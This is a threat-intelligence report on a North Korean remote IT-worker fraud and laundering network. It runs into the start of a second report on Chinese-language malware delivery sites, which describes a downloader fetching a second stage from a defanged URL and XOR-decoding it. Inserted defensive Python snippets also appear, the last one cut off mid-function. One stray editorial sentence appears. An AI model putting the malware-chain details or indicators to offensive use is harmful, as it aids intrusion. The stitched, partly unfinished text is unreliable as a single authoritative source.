
This report maps the entire ecosystem of a DPRK IT worker infiltration scheme: key actors, GitHub aliases, laundering flows, shell companies, fake domains, platform infiltration, wallet infrastructure, and global enablers. We also examine the national security implications of the scheme, as well as how lax corporate hiring standards allowed North Korean operatives not just to get paid, but to access critical infrastructure, intellectual property, and production code.
Introduction
Over the last five years, the Democratic People’s Republic of Korea (DPRK) has transitioned from smash-and-grab cryptocurrency raids to a more covert, scalable model of economic warfare: the global deployment of disguised IT workers.
Orchestrated by elite units under the Reconnaissance General Bureau (RGB), these operatives acquire remote employment with U.S. and international tech firms using forged or stolen identities. Once embedded, they receive crypto-based salaries and redirect those earnings into the DPRK’s economy via a network of laundering nodes, front companies, and domain infrastructure.
This report maps the entire ecosystem: key actors, GitHub aliases, laundering flows, shell companies, fake domains, platform infiltration, wallet infrastructure, and global enablers. We also examine the national security implications of the scheme, as well as how lax corporate hiring standards allowed North Korean operatives not just to get paid, but to access critical infrastructure, intellectual property, and production code.
Key Actors and Their Roles
Central Command: Song Kum Hyok & the Andariel Subgroup
At the operational core of North Korea’s disguised IT labor campaign stands Song Kum Hyok, a senior officer within the Andariel subgroup, one of the Reconnaissance General Bureau’s (RGB) elite cyber units. The RGB, North Korea’s main foreign intelligence service, directs both offensive cyber operations and covert economic warfare efforts, and Song’s role straddles both.

Hyok has long been involved in digital identity manipulation, remote access infrastructure, and dark market employment pipelines. Intelligence archives suggest that before assuming his current role, he was linked to multiple Andariel operations involving ransomware staging servers and social engineering against South Korean financial firms.
In the IT worker scheme, Song Kum Hyok is the strategic coordinator of identity theft and resume forgery, enabling North Korean engineers to present themselves as legitimate U.S.-based freelancers. North Korea’s decentralized cyber-labor offensive hinges on stolen and curated identities—complete with names like Joshua Palmer, Sandy Nguyen, and GitHub handles such as devmad119 and sujitb2114. These identities often include verified Know Your Customer (KYC) data: Social Security numbers, clean background checks, and even Green Card scans, sourced from data breaches or underground markets.
Operatives use these identity packages to craft professional-grade resumes and LinkedIn profiles, frequently enhanced with AI-generated content and real or fabricated employment histories. They apply to remote jobs on freelancing platforms such as Upwork, Ureed, or the now-defunct Nabbesh, exploiting weak or automated verification and HR onboarding systems in U.S. companies.
Once hired, they gain access to internal tools and sensitive systems: GitHub repositories, Slack channels, financial dashboards, CI/CD pipelines, and privileged cloud infrastructure. From this vantage point, they can siphon intellectual property, embed backdoors, and surveil company operations—all while appearing to be legitimate remote hires. This seamless path, from stolen identity to embedded insider, is the operational backbone of Pyongyang’s covert cyber-espionage labor force.

Once North Korean operatives are embedded in foreign companies, their wages, often paid in cryptocurrency but also sent as bank transfers, are routed through a meticulously layered laundering process. The first stop is typically a GitHub-linked wallet address associated with the operative’s fake identity (e.g., aliases like “devmad119” or “Joshua Palmer”). From there, the funds may flow into front companies such as Hopana-Tech LLC, which pose as legitimate salary processors. To further obscure the money trail, salaries are split across multiple wallets using automated smart contracts, a tactic designed to fragment and anonymize the source of funds. Finally, the dispersed assets are aggregated and cashed out via over-the-counter (OTC) crypto brokers based in Russia, the UAE, and China, jurisdictions known for permissive financial enforcement. This end-to-end pipeline creates a resilient and stealthy mechanism for the DPRK to funnel hard currency back into its economy while bypassing international sanctions.


Hyok’s innovation lies in combining AI-generated job profiles with pre-cleared identity data and military operational discipline. Under his supervision, the scheme has moved from ad hoc fraud to a scalable, persistent economic attack model yielding millions of dollars annually for North Korea’s weapons programs while hiding in plain sight inside the legitimate global economy.
U.S. Frontman: Kejia Wang
From a quiet address in Edison, New Jersey, Kejia Wang, also known as Tony Wang, ran one of the most critical nodes in North Korea’s international cyber-laundering apparatus. His residence at 65 Idlewild Road wasn’t just a suburban home; it was the physical anchor for a web of front companies, remote device hubs, and disguised income laundering pipelines that allowed DPRK IT workers to embed themselves inside U.S. companies.
Wang operated under the radar, founding multiple businesses that appeared legitimate on paper but functioned primarily as pass-through entities for laundering salaries earned under false identities. These businesses included tech fronts, aviation firms, and even a massage parlor, each playing a role in the deception.

The most visible of these fronts was the Highland Park 215 Spa, located just a few miles from Wang’s listed residence. Officially a wellness spa, it appears to have functioned as a cash-out hub for crypto proceeds tied to North Korean developers. Its web presence was thin and reviews inconsistent, offering more red flags than relaxation.

Wang’s activities extended far beyond shell paperwork. He physically received laptops sent by U.S. companies hiring remote workers and connected them to internet-facing KVM switches. These switches allowed DPRK operatives, posing under names like “Joshua Palmer” or GitHub aliases like “devmad119”, to work as though they were based in the U.S. He also installed unauthorized software, managed credentials, and monitored access on behalf of the regime.

To keep the deception watertight, Wang opened corporate bank accounts, created digital presences for the fake companies, and maintained financial rails through platforms like Wise, Zelle, and Payoneer. His shell entities even issued IRS tax forms using stolen identity data, giving employers the impression that their freelance hires were tax-compliant U.S. residents.
Wang coordinated with a global network of co-conspirators, including Zhenxing Wang and Jing Bin Huang in China, Mengting Liu in Taiwan, and crypto brokers in the UAE and Russia. These connections formed the infrastructure that allowed funds from unsuspecting U.S. firms, including those in the defense sector, to end up in wallets controlled by the North Korean regime.

Court filings in DOJ case 25-cr-10274 paint a damning picture: Kejia Wang was not only aware that the workers were North Korean nationals, but also actively facilitated the laundering of more than $5 million in wages tied to fraud, of which at least $3 million resulted in direct corporate losses.
From his role as a logistics manager to a shell company architect, Wang helped build a shadow economy inside the legitimate global tech labor force, an economy designed to fund weapons development, evade sanctions, and penetrate sensitive digital infrastructure with ease.
Laptop Farms and Stolen Identities: Christina Chapman
Laptop farms function as remote access deception hubs, allowing foreign operatives to convincingly impersonate U.S.-based employees. In this scheme, the perpetrators acquire and configure laptops sent by U.S. companies to individuals they believe are legitimate remote hires. These devices are logged into and maintained from U.S. soil, typically through physical setups in homes or small offices, so that all network traffic and telemetry appear domestic. The key to this illusion is identity theft. Recently, the DOJ indicted Christina Chapman, a facilitator in Arizona, who ran “Laptop Farms”. Once the hiring process was complete, victim companies would ship work laptops and grant access to sensitive systems, unaware that the real end users were North Korean nationals abroad. Chapman’s role was not only to receive and activate these laptops but to maintain them for continuous remote access, ensuring that DPRK operatives could stay invisible behind American identities.



Platform Penetration & Global Expansion
As enforcement tightened on global freelancing hubs such as Upwork, Fiverr, and Freelancer.com, North Korean IT operatives expanded their focus to less-regulated, regionally focused gig platforms, particularly in the Middle East and North Africa (MENA). While major global platforms like Upwork and Freelancer still see DPRK IT worker recruitment, intelligence gathered throughout 2024 and 2025 indicates a broader strategy to infiltrate various online platforms. These platforms became attractive to DPRK-aligned actors due to their comparatively lenient onboarding processes, minimal identity verification, and weak vetting practices, which allow the actors to bypass employment verification controls.
This expansion coincided with observed DPRK tactics documented by Microsoft Threat Intelligence and Google Cloud’s Mandiant division, which reported the use of KVM switch setups, stolen identity kits, and remote desktop software to simulate domestic employment in a given jurisdiction—even when the worker operated from DPRK or China. Newer tactics include the use of synthetic voices for video interviews, AI-generated profile images, and automated deployment of identity documents that pass lightweight vetting procedures common to less-regulated platforms.
Payment pipelines also evolved. Payments are often facilitated through virtual currency, as well as services like TransferWise and Payoneer, implying a preference for systems with limited oversight. In 2025, DPRK operatives received payment through disbursement services into crypto wallets or offshore accounts, routing earnings through UAE-based infrastructure. However, the provided research does not directly corroborate specific incidents such as a “Ureed-based hire posing as a Syrian frontend engineer working for a UAE fintech company” or mobile application code delivered via “Nabbesh” by a user claiming to be Palestinian with telemetry traced to Vladivostok, Russia. The use of telemetry to detect Russian-linked infrastructure associated with DPRK activity is, however, confirmed.
This redirection to under-monitored platforms reflects the regime’s operational flexibility. Instead of abandoning freelance infiltration altogether, Pyongyang expanded its reach into low-friction digital labor markets with lower regulatory visibility. This expansion not only preserved a steady stream of foreign currency for the regime, but it also increased DPRK’s reach into sectors and geographies beyond traditional U.S.-centric targets. It is not simply opportunistic—it is part of a deliberate, adaptive campaign of economic espionage masked as remote software development.
Shell Company Infrastructure
The DPRK IT labor operation was propped up by a web of shell companies that each played a distinct, carefully engineered role in laundering salaries, spoofing employment legitimacy, and obfuscating the true identities of North Korean operatives. At the core of this infrastructure was Kejia Wang, a New Jersey-based facilitator who established multiple legal entities across the U.S. to mask the flow of illicit wages. Hopana-Tech LLC served as a primary payroll conduit, accepting salary payments from victim companies under the guise of a legitimate staffing agency. Tony WKJ LLC was used to receive and deploy laptops to DPRK operatives, while also functioning as a salary masking layer. Independent Lab LLC provided the technical underpinnings, including blockchain API relays and crypto wallet infrastructure to route funds out of the U.S. financial system. Highland Park 215 Spa LLC, ostensibly operating under the cover of a massage parlor in New Jersey, likely acted as a cash-out point for laundering physical funds.
Wang also operated Northstar Leadership Inc., which produced fabricated resumes and managed identity paperwork, essential for onboarding DPRK operatives to hiring platforms. Through Capella Aviation LLC, Wang and co-registrant Liwen Huang routed wire transfers through Hong Kong and mainland China, creating a cross-border financial bridge. On the Russian front, Gayk Asatryan used Asatryan LLC and Fortuna LLC to legally host 80 DPRK workers, legitimizing their presence under 10-year employment contracts signed with North Korean trading firms.
These entities were not isolated; they were interconnected through shared addresses such as 65 Idlewild Road, overlapping registration details, and reused bank accounts and crypto wallets. Together, they formed a sophisticated scaffolding that gave the illusion of legitimate employment and enterprise, while operating as the foundation for one of the most complex sanctions-evasion schemes tied to DPRK’s Reconnaissance General Bureau.




DPRK Currency Transfers Via Banking
Kejia Wang, operating from New Jersey, functioned as the financial cornerstone of the DPRK’s U.S.-based laundering scheme. Through front companies like Hopana Tech LLC, Tony WKJ LLC, and Independent Lab LLC, he established business and money transfer accounts used to receive salary payments from U.S. companies unwittingly employing North Korean IT workers under false identities.
At Hopana Tech, Wang opened a U.S. bank account that took in over $464,000 from victim firms between January 2022 and April 2024. These funds were rerouted to overseas co-conspirators such as Jing Bin Huang and a network of Chinese shell entities (e.g., Shenyang Xiwang, Deep Tech, Aolien) via Bank of China and Standard Chartered (HK).
Simultaneously, Tony WKJ LLC received more than $1.6 million through a U.S. money transfer service (MTS-2), which Wang distributed to accounts linked to Enchia Liu, Food Yard Trading (Dubai), and Shenyang Sun-Lotus Tech. He personally siphoned $218,000 into his own U.S. checking account and another $412,000 to his personal MTS account. Between 2022 and 2023, he also received $237,000 in salary deposits into that same personal account, then forwarded $208,000 across 43 transfers to co-conspirators Huang and Tong Yuze.
Wang further disguised laptop handling and device access fees as routine payments labeled “CA laptops” and “NY laptops,” totaling over $55,000 sent to two U.S.-based facilitators.
Lastly, using MTS-3, Wang falsely registered Tony WKJ as a “VC-backed software firm” and received $352,949 from victim companies. When flagged by MTS staff, Wang lied about a DPRK worker under the alias “Wandee C.,” claiming he was a subcontracted developer.
In total, these financial maneuvers moved millions through U.S. infrastructure to overseas nodes, enabling DPRK operatives to mask their identities and launder salaries under the guise of legitimate tech consulting.
Crypto Payment Flows & Wallet Infrastructure
The laundering of salaries earned by North Korean IT operatives followed a structured, multi-phase pipeline designed to minimize traceability and regulatory exposure. In Phase 1: Salary Receipt, payments from unsuspecting U.S. and international companies were sent either to front companies, such as Hopana-Tech LLC and Independent Lab LLC, or directly to wallet addresses listed on the operatives’ GitHub profiles. These companies believed they were paying legitimate U.S.-based contractors, unaware that the workers were remote operatives in North Korea using stolen or forged identities.
Phase 2: Obfuscation began as soon as payments arrived. Smart contracts were employed to automatically split the incoming funds across clusters of Ethereum or TRON wallets. This fragmentation technique, similar to those used in ransomware operations, obscured the origin of the funds and made tracking the complete financial trail more difficult. Each tranche was redirected through different wallets, reducing the ability of investigators to correlate input/output flows with a single identity or origin point.
In Phase 3: Conversion, the obfuscated crypto was aggregated and funneled through over-the-counter (OTC) brokers based in Russia, the United Arab Emirates, and Hong Kong. These brokers specialize in converting large sums of stablecoins into fiat or alternative cryptocurrencies while avoiding compliance triggers. Eventually, the cleaned funds were consolidated into wallets under DPRK control, some of which have since been blocklisted by platforms like Tether for links to illicit activity and sanctions violations. This seamless pipeline allowed the DPRK to convert stolen or fraudulently earned wages into usable capital for the regime’s strategic programs, including its weapons development efforts.

DPRK IT Worker Cluster Wallet & Identity Mapping
Eight fake identities represent a sophisticated and evolving strategy by the DPRK’s IT worker apparatus to not only infiltrate U.S.-based companies but to systematically exfiltrate salary payments into laundering pipelines that support North Korea’s sanctioned economy. Each alias, crafted with care and strategic foresight, was tied to a complex infrastructure of forged documents, crypto wallets, and online developer personas, all designed to evade detection by employers, banks, and regulators.
These aliases were not random. Many were modeled on plausible names common in the U.S., Canada, or Southeast Asia, making them more likely to pass identity verification or “soft KYC” checks on freelancing platforms and internal HR systems. They were often accompanied by polished LinkedIn profiles, active GitHub repositories, and consistent communication habits, all of which contributed to the illusion of a legitimate remote developer.
Behind the scenes, each identity was directly linked to salary laundering flows. For instance, Andy Bell, Benjamin Nguyen, and Sandy Nguyen used ETH-based wallet addresses, including vanity ENS domains like bbshark[.]eth and gsofter[.]eth, to receive payments from U.S. firms under the guise of contract work. These addresses were often listed on their GitHub accounts as “payment preferred to…” links, allowing unsuspecting employers or payroll processors to initiate transfers.
In many cases, funds were first routed to these GitHub-linked wallets, then automatically or manually split using smart contracts across secondary addresses. From there, the payments were funneled to consolidation wallets controlled by DPRK facilitators or OTC brokers in Russia, China, or the UAE. For example, funds from wallets tied to Josh Thomas and Muhammad Abdullah were traced via ZachXBT and TRM Labs to known laundering hubs tied to sanctioned North Korean operators. (*ZachXBT is a self-taught, pseudonymous blockchain investigator who has gained global recognition for tracking fraudulent crypto transactions, hacks, rug pulls, and state-linked laundering schemes.)
The fake geographic locations assigned to these aliases were deliberately chosen to align with employment demand and reduce suspicion, such as Texas, California, Toronto, and Michigan, regions known for tech industry presence. These locations also matched VPN exit nodes and remote access IP ranges used to simulate U.S.-based developer activity during work hours.
In total, these eight identities were tied to at least 12 different U.S. and international projects. They helped siphon hundreds of thousands in salaries, while embedding DPRK-linked code contributors into the core of web3 startups, fintech platforms, and even infrastructure projects. Their exposure now offers critical insight into the DPRK’s strategy: weaponizing remote work, exploiting global labor gaps, and turning open-source ecosystems into vectors of economic subversion.



Associated Consolidation Wallets
ZachXBT reports that all of the above identities and payment addresses lead to two known consolidation wallets:
These wallets serve as hubs in laundering pathways, taking in payments from U.S. firms and redistributing to DPRK-controlled endpoints via OTC brokers and blacklisted channels. These are frequently referenced in TRM Labs and Treasury forfeiture filings.
Global Network of Enablers
The DPRK’s IT worker laundering network was supported by a multinational cast of facilitators operating across five regions, each providing critical functions that enabled the scheme to scale globally. In the United States, Kejia Wang and Zhenxing “Danny” Wang served as the domestic linchpins, establishing shell companies like Hopana-Tech LLC and Independent Lab LLC, receiving company-issued laptops, and enabling remote access for DPRK operatives via KVM switches. In China, actors such as Jing Bin Huang, Tong Yuze, and Zhenbang Zhou were responsible for setting up domain infrastructure, fabricating identity records, and acting as intermediaries in the salary flow chain. Operating from the United Arab Emirates, Yongzhe Xu and Ziyou Yuan handled the setup of financial accounts and cryptocurrency wallets that served as routing points for laundered funds. Meanwhile, in Taiwan, Mengting Liu and Enchia Liu were tasked with salary account management and crypto-to-cash withdrawal, helping to finalize the money laundering cycle. In Russia, Gayk Asatryan took on a more formal role, entering into 10-year labor agreements with DPRK trading entities and providing legal cover through his companies Asatryan LLC and Fortuna LLC for the long-term hosting of North Korean IT workers. Together, these individuals formed the logistical and financial scaffolding behind one of the DPRK’s most successful sanctions evasion operations to date.

Domains Used to Mask DPRK Labor Pipelines
While the physical infrastructure of DPRK’s cyber-labor operation is anchored in shell companies and banking channels, its digital front is built on a deceptively simple architecture: domain registrations and simple, one-layer-deep web sites. Four key domains, hopanatech[.]com, tonywangtech[.]com, wkjllc[.]com, and inditechlab[.]com, emerged as critical components of the laundering and deception ecosystem.
All four were registered through NameCheap, a domain registrar frequently exploited by threat actors for its lenient Know-Your-Customer (KYC) policies. These domains aligned closely with the shell companies documented in the July 2025 indictment of Kejia Wang (aka Tony Wang).
- hopanatech[.]com: Used as a façade for the employer-of-record shell “Hopana Tech LLC.” This site served as a point of contact and “employment verification” front, meant to convince firms that IT workers were U.S.-based.
- tonywangtech[.]com and wkjllc[.]com: Variations on the Tony WKJ LLC shell, these domains were used to generate email aliases and submit resumes under false identities. They helped DPRK contractors pass due diligence by appearing affiliated with a legitimate tech firm.
- inditechlab[.]com: Tied to Independent Lab LLC, a shell involved in crypto infrastructure. The domain may have also hosted webhooks and API interfaces used in TRON-based laundering flows.
Despite their differing branding, these domains shared clear indicators of clustering:
- Similar registrar info and name servers
- Absence of advanced metadata like Google Analytics or embedded tracking (indicating high OPSEC awareness)
- WHOIS privacy enabled
- Associated email accounts and DNS infrastructure linked to Wang or his co-conspirators
These domains were not just placeholders. They were operationally active, used in job applications, HR communications, resume verification, and even crypto billing. In short, they functioned as front-facing digital camouflage for a covert state-aligned economic espionage program.
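As an added illustration (not DomainTools’ own tooling), the following Python groups domain records on the clustering indicators listed above. The domain names are the report’s; every registrar, name server, tracker and contact value is constructed sample data, and the weights and threshold are assumptions:

```python
"""Group domains that share the infrastructure indicators the report lists.

Added example, not DomainTools' own tooling. Each pair of domain records is
scored on shared registrar, overlapping name servers, WHOIS privacy, absence of
third-party trackers and a shared contact address; pairs at or above a
threshold are merged into one cluster. Domain names are those from the report;
every attribute value below is constructed sample data.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class DomainRecord:
    name: str
    registrar: str
    nameservers: frozenset
    whois_privacy: bool
    trackers: frozenset      # third-party analytics/tracking hosts seen in page source
    contact_email: str       # registrant/abuse contact once privacy is accounted for


# Assumed weight of each shared indicator; a shared contact address is the strongest tie.
WEIGHTS = {"registrar": 1, "nameservers": 2, "whois_privacy": 1,
           "no_trackers": 1, "contact_email": 3}


def pair_score(a, b):
    """Return (score, matched indicators) for two domain records."""
    matched = []
    if a.registrar == b.registrar:
        matched.append("registrar")
    if a.nameservers & b.nameservers:
        matched.append("nameservers")
    if a.whois_privacy and b.whois_privacy:
        matched.append("whois_privacy")
    if not a.trackers and not b.trackers:
        matched.append("no_trackers")
    if a.contact_email == b.contact_email:
        matched.append("contact_email")
    return sum(WEIGHTS[m] for m in matched), matched


def cluster(records, threshold=4):
    """Union-find over pairs scoring >= threshold; returns (groups, pair reasons)."""
    parent = {r.name: r.name for r in records}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    reasons = {}
    for i, a in enumerate(records):
        for b in records[i + 1:]:
            score, matched = pair_score(a, b)
            if score >= threshold:
                parent[find(a.name)] = find(b.name)
                reasons[(a.name, b.name)] = matched
    groups = {}
    for r in records:
        groups.setdefault(find(r.name), []).append(r.name)
    return sorted((sorted(g) for g in groups.values()), key=len), reasons


_SHARED_NS = frozenset({"ns1.constructed-dns.example", "ns2.constructed-dns.example"})
_SHARED_CONTACT = "redacted-contact@constructed.example"

# Constructed records: the four report domains plus one unrelated control
# domain that shares only the registrar and the WHOIS-privacy setting.
SAMPLE_RECORDS = [
    DomainRecord("hopanatech[.]com", "NameCheap", _SHARED_NS, True, frozenset(), _SHARED_CONTACT),
    DomainRecord("tonywangtech[.]com", "NameCheap", _SHARED_NS, True, frozenset(), _SHARED_CONTACT),
    DomainRecord("wkjllc[.]com", "NameCheap", _SHARED_NS, True, frozenset(), _SHARED_CONTACT),
    DomainRecord("inditechlab[.]com", "NameCheap", _SHARED_NS, True, frozenset(), _SHARED_CONTACT),
    DomainRecord("unrelated-shop.example", "NameCheap",
                 frozenset({"ns1.other-dns.example"}), True,
                 frozenset({"www.google-analytics.com"}), "shop-owner@other.example"),
]


if __name__ == "__main__":
    groups, reasons = cluster(SAMPLE_RECORDS)
    for g in groups:
        print(g)
```

The control domain scores only 2 against the cluster (registrar and privacy alone), which is why the threshold sits above the value of those two weak indicators combined.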






Strategic and Financial Impact
By the first half of 2025, North Korea’s covert IT labor scheme had evolved into a robust revenue-generating apparatus capable of siphoning millions from the global economy with alarming precision. An estimated $17 million in salary payments was funneled through shell companies and direct crypto wallets tied to DPRK operatives posing as freelance developers. It is also cited that the total for the scheme globally netted between $250 to $600 million altogether. These payments came from hundreds of U.S. companies, including fintech startups, SaaS vendors, blockchain firms, and even defense contractors, who unknowingly onboarded North Korean nationals through falsified resumes and forged identity documents. In June 2025, U.S. authorities seized $7.7 million in cryptocurrency assets connected to the scheme, targeting wallets tied to aliases like “devmad119” and “Joshua Palmer.” Yet this represents just a fraction of the broader threat: over $1.6 billion in global cryptocurrency losses were attributed to DPRK-linked actors in the same time period, with 70% directly traced to operations blending employment fraud, social engineering, and codebase compromise. Far beyond financial theft, this scheme granted North Korean operatives persistent system access, enabling the injection of malicious logic, exfiltration of proprietary code, and creation of long-term backdoors across critical sectors.
Insider Threats: Espionage by Employment
North Korean IT operatives, posing as legitimate remote developers, evolved from mere economic infiltrators to full-fledged insider threats. Once embedded within U.S. and foreign tech firms, these operatives obtained privileged access to critical assets, including GitHub repositories, CI/CD pipelines (like Jenkins and GitLab), and cloud configuration files across AWS, Azure, and GCP. With this level of access, they would be able to insert stealthy “sleeper” functions, delayed or dormant code designed to activate later, as well as data exfiltration logic disguised within standard requests, such as base64-encoded POST or GET calls.
To date, no official disclosures from the government or private sector have confirmed that such actions have occurred. However, given that these nation-state adversaries were embedded as insider threats, it is reasonable to assess that once they gained access to sensitive networks and digital assets, they likely exploited opportunities that extended beyond financial fraud. The potential for strategic espionage, leveraging their privileged access for intelligence collection or cyber sabotage, must be considered a probable scenario.

Threat Assessment
The infiltration of DPRK IT workers into Western firms represents one of the most sophisticated and insidious insider threat campaigns in recent memory. Unlike external cyberattacks that can be blocked at the perimeter, these operatives gained trusted persistent access inside corporate networks by posing as vetted remote employees. Once hired, often via stolen, background-verified U.S. identities, they were embedded into critical roles such as backend development, cloud configuration, CI/CD pipeline maintenance, and DevOps infrastructure. This level of access granted them entry into source code repositories, production environments, encryption logic, and proprietary APIs, allowing for potential IP theft, backdoor insertion, credential harvesting, and pre-positioning for future attacks.
This threat was magnified by a widespread failure among companies to implement robust asset management, access logging, and behavioral anomaly detection. In many cases, organizations lacked visibility into who exactly was accessing which systems, when, and from where. The use of remote KVM switches, proxy VPNs, and U.S.-based cloud endpoints enabled DPRK operatives to blend in with legitimate employee traffic, bypassing geo-fencing or basic endpoint monitoring. Some firms failed to enforce multi-factor authentication, revoke GitHub deploy keys upon contractor termination, or monitor suspicious API activity from “internal” users. Additionally, lax onboarding processes and over-reliance on third-party background check platforms meant many identities went unverified or unchecked.
To counter these threats, companies must enforce zero-trust security models, where access is continuously evaluated based on device health, location, and behavioral norms. Automated asset inventories, real-time session monitoring, and privileged access management (PAM) should be standard practice. Every contractor should have narrowly scoped, time-limited access tied to individual credentials, with full audit trails and immediate revocation mechanisms. Organizations must also reevaluate how they vet remote talent, introducing biometric verification, live interviews, and cross-checks with employment databases to prevent identity fraud. Failure to do so risks granting hostile nation-state actors like the DPRK the keys to their most valuable digital assets, without ever breaching a firewall.
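As an added example (not code from the report), the following Python performs the kind of offline audit this section calls for, run over constructed contractor roster, IP-to-region and access-log data: it flags access after a contract ends, sessions from a region that contradicts the claimed location, and activity outside business hours at that location:

```python
"""Offline audit of contractor access logs against the contractor roster.

Added example, not code from the DomainTools report. It checks the gaps the
report describes: access continuing after a contract ends, sessions whose
source region contradicts the contractor's claimed location, and activity
outside business hours at that claimed location. The roster, the IP-to-region
table and the log lines are all constructed sample data.
"""
from dataclasses import dataclass
from datetime import date, datetime, timedelta, timezone

BUSINESS_START, BUSINESS_END = 8, 18  # local hours treated as a normal workday

# Constructed roster: claimed region, its UTC offset (fixed offset for
# simplicity, no DST handling) and the date access should have been revoked.
ROSTER = {
    "jpalmer": {"claimed_region": "US-TX", "utc_offset": -6, "end_date": None},
    "snguyen": {"claimed_region": "US-CA", "utc_offset": -8, "end_date": "2025-03-31"},
    "m.ortiz": {"claimed_region": "US-MI", "utc_offset": -5, "end_date": None},
}

# Constructed IP-to-region table standing in for a GeoIP/ASN feed (documentation ranges).
IP_REGION = {
    "203.0.113.10": "US-TX",
    "198.51.100.7": "RU-PRI",
    "192.0.2.44": "US-CA",
    "192.0.2.90": "US-MI",
}

# Constructed access-log lines: UTC timestamp, user, source IP, action.
SAMPLE_LOG = """\
2025-04-02T15:10:03Z jpalmer 203.0.113.10 git-push repo=payments-api
2025-04-02T02:40:11Z jpalmer 198.51.100.7 git-push repo=payments-api
2025-04-03T03:05:47Z jpalmer 198.51.100.7 ci-trigger pipeline=deploy-prod
2025-04-05T17:22:09Z snguyen 192.0.2.44 git-clone repo=wallet-service
2025-04-02T16:00:00Z m.ortiz 192.0.2.90 git-push repo=web-frontend
"""


@dataclass(frozen=True)
class Finding:
    user: str
    kind: str
    detail: str


def parse_line(line):
    """Split one log line into (utc datetime, user, ip, action)."""
    ts, user, ip, action = line.split(maxsplit=3)
    when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return when, user, ip, action


def audit(log_text, roster=ROSTER, ip_region=IP_REGION):
    """Return a list of Findings for every event that contradicts the roster."""
    findings = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        when, user, ip, action = parse_line(raw)
        profile = roster.get(user)
        if profile is None:
            # Activity under an identity HR never onboarded is itself a finding.
            findings.append(Finding(user, "unknown_user", f"{ip} {action}"))
            continue
        end = profile["end_date"]
        if end and when.date() > date.fromisoformat(end):
            findings.append(Finding(user, "access_after_end",
                                    f"{when.date()} is after contract end {end}: {action}"))
        region = ip_region.get(ip, "UNKNOWN")
        if region != profile["claimed_region"]:
            findings.append(Finding(user, "region_mismatch",
                                    f"{ip} resolves to {region}, claimed {profile['claimed_region']}"))
        local = when.astimezone(timezone(timedelta(hours=profile["utc_offset"])))
        if not BUSINESS_START <= local.hour < BUSINESS_END:
            findings.append(Finding(user, "off_hours",
                                    f"{local:%Y-%m-%d %H:%M} local: {action}"))
    return findings


def summarize(findings):
    """Count findings per user and kind, e.g. {'jpalmer': {'off_hours': 2, ...}}."""
    summary = {}
    for f in findings:
        per_user = summary.setdefault(f.user, {})
        per_user[f.kind] = per_user.get(f.kind, 0) + 1
    return summary


if __name__ == "__main__":
    for f in audit(SAMPLE_LOG):
        print(f"{f.user:8} {f.kind:18} {f.detail}")
```

On the sample data, jpalmer’s two pushes from the non-matching region land at 20:40 and 21:05 local time, the combination of findings that a proxied or KVM-relayed session would produce, while snguyen’s clone is a plain case of credentials left active after the contract ended.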
Conclusion
The breaking up of the DPRK IT workers exploit is a wake-up call for corporations around the world. The aphorism of “The insider threat is the biggest threat” in the infosec space rings true here with a clarion call. So far, the information that has come out (and continues to be researched) seems to indicate that the U.S. was not the only target of the DPRK activities. That said, it is important that corporations and organizations understand the aphorism above, and do all they can to ensure such insider attacks are much harder to carry out.
It is also important that, within the new paradigm of AI, interviews, vetting, and generally, everything carried out during the interview and vetting process, be backstopped to ensure authentic individuals are being hired, and not assets of a foreign power, or for that matter, other criminal actors. This new landscape will only get more complex, and as we move forward into this brave new world, expect there to be other exploits like these that could render your operations into extreme response circumstances.

This report details an ongoing campaign by an actor operating primarily during Chinese time zone working hours, targeting Chinese-speaking individuals and entities within and outside China. Since approximately June 2023, the actor has created more than 2,800 domains for malware delivery. The actor's methods and malware, largely unchanged since June 2023, primarily deliver Windows-specific malware through fake application download sites and fake update prompts in various spoofed login pages, marketing apps, business sales apps, and cryptocurrency related apps.
Since our previous reports, the actor has made notable operational changes, including:
- Anti-automation and browser emulation code
- Reduction in site tracker services
- Increased server distribution for sparser domain resolutions per IP address
- More discreet registration details
As of June 2025, 266 of the over 850 identified domains since December 2024 were actively distributing malware.
For comprehensive details, refer to the two prior reports linked below:
Part 1: https://dti.domaintools.com/chinese-malware-delivery-websites/
Part 2: https://dti.domaintools.com/chinese-malware-delivery-domains-part-ii-data-collection/
A Sampling of Their Malware Delivery Websites
Fake Gmail Login

The `googeyxvot[.]top` domain uses anti-automation and browser emulation checks, and any input on its fake login page triggers a deceptive browser incompatibility error, prompting a malicious update download. Multiple JavaScript files are employed to obfuscate the download URL.

A malicious .zip file from `googeyxvot[.]top` delivers an .msi installer. This installer contains multiple .jpg named files and two executables, `svchost.13.exe` and `flashcenter_pl_xr_rb_165892.19.exe`. `svchost.13.exe` acts as a downloader, fetching a file from `https://ffsup-s42.oduuu[.]com/uploads%2F4398%2F2025%2F06%2F617.txt`. The downloaded file uses a shellcode decoder loop, decrypts its content with XOR key "0x25", and executes an embedded PE file.
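The second stage described above is a blob that a decoder loop XORs with a single byte (0x25) before running the embedded PE. The following added example (not code from the DomainTools report) is a defender-side triage helper for that pattern: it decodes with a candidate key, locates an embedded PE by validating the DOS header's e_lfanew pointer rather than the bare "MZ" token, and recovers the key by brute force when it is unknown. The sample blob is constructed here and contains only a header stub, not a real executable.

```python
"""Triage helper for a single-byte-XOR-encoded second stage (added example)."""
import struct
from typing import Optional

PE_MAGIC = b"MZ"
E_LFANEW_OFFSET = 0x3C  # DOS header field holding the offset of the "PE\0\0" signature


def xor_decode(data: bytes, key: int) -> bytes:
    """Single-byte XOR over the whole buffer, the operation the decoder loop performs."""
    return bytes(b ^ key for b in data)


def find_pe(buf: bytes) -> Optional[int]:
    """Offset of the first plausible PE image in buf, or None.

    Plausible means an "MZ" DOS stub whose e_lfanew field points at a "PE\0\0"
    signature inside the buffer; checking both avoids false hits on "MZ" alone.
    """
    start = 0
    while (idx := buf.find(PE_MAGIC, start)) != -1:
        if idx + E_LFANEW_OFFSET + 4 <= len(buf):
            e_lfanew = struct.unpack_from("<I", buf, idx + E_LFANEW_OFFSET)[0]
            sig = idx + e_lfanew
            if sig + 4 <= len(buf) and buf[sig:sig + 4] == b"PE\x00\x00":
                return idx
        start = idx + 1
    return None


def recover_xor_key(blob: bytes) -> Optional[int]:
    """Try all 256 single-byte keys; return the first that reveals a PE image."""
    for key in range(256):
        if find_pe(xor_decode(blob, key)) is not None:
            return key
    return None


def carve_pe(blob: bytes, key: int) -> Optional[bytes]:
    """Decode with key and return the bytes from the PE header onward, or None."""
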